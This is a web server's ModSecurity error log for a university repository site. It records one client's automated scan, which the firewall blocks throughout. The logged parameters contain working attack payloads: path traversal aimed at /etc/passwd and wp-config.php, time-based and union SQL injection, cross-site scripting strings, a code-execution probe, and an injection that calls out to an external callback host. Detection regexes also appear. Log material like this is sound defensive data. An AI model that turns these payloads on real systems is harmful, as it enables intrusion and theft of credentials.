[Tue Aug 29 11:36:44.439331 2023] [:error] [pid 1456] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWwdP0AAAAe"]
[Tue Aug 29 11:36:46.365728 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113sCo-f0AAAWnjjwAAAAT"]
[Tue Aug 29 11:36:49.510962 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWkfWUAAAAQ"]
[Tue Aug 29 11:36:56.529502 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAW51X0AAAAF"]
[Tue Aug 29 11:36:57.473296 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWx83QAAAAg"]
[Tue Aug 29 11:37:07.515825 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW7FJwAAAAE"]
[Tue Aug 29 11:37:09.430678 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW7FMkAAAAE"]
[Tue Aug 29 11:37:16.420734 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWuq9gAAAAZ"]
[Tue Aug 29 11:37:16.530981 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAW9IWYAAAAI"]
[Tue Aug 29 11:37:16.706945 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWdsuMAAAAM"]
[Tue Aug 29 11:37:27.361592 2023] [:error] [pid 1486] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXOL2AAAAAh"]
[Tue Aug 29 11:37:35.445684 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXEH4YAAAAN"]
[Tue Aug 29 11:37:37.570614 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWpXmUAAAAW"]
[Tue Aug 29 11:37:45.415308 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWpXrAAAAAW"]
[Tue Aug 29 11:37:47.511324 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAUFdngAAAA9"]
[Tue Aug 29 11:37:50.448244 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAUFdogAAAA9"]
[Tue Aug 29 11:37:52.425728 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAARiDswAAAAJ"]
[Tue Aug 29 11:37:59.487233 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAUFdqsAAAA9"]
[Tue Aug 29 11:37:59.509252 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXWLHsAAAAD"]
[Tue Aug 29 11:38:10.686246 2023] [:error] [pid 1507] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXj8lkAAAAQ"]
[Tue Aug 29 11:38:23.363925 2023] [:error] [pid 1532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAX8PQ0AAAAK"]
[Tue Aug 29 11:38:33.376880 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAYMWHYAAAAR"]
[Tue Aug 29 11:38:34.478618 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26gjztf7p4u6dihd.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAYMWHkAAAAR"]
[Tue Aug 29 11:38:34.525556 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAYIYhYAAAAM"]
[Tue Aug 29 11:38:35.368203 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAXVyrkAAAAB"]
[Tue Aug 29 11:38:46.370959 2023] [:error] [pid 1550] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYOaFwAAAAa"]
[Tue Aug 29 11:38:47.366024 2023] [:error] [pid 1549] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYNhDcAAAAZ"]
[Tue Aug 29 11:38:47.363352 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAV1EdUAAAAd"]
[Tue Aug 29 11:38:56.366333 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYWXYkAAAAF"]
[Tue Aug 29 11:38:57.384061 2023] [:error] [pid 1576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYo0ykAAAAZ"]
[Tue Aug 29 11:38:57.384299 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYcunkAAAAN"]
[Tue Aug 29 11:39:06.653993 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYlCL8AAAAP"]
[Tue Aug 29 11:39:07.075620 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaXqoMAAAAl"]
[Tue Aug 29 11:39:12.058449 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagEwoAAAAn"]
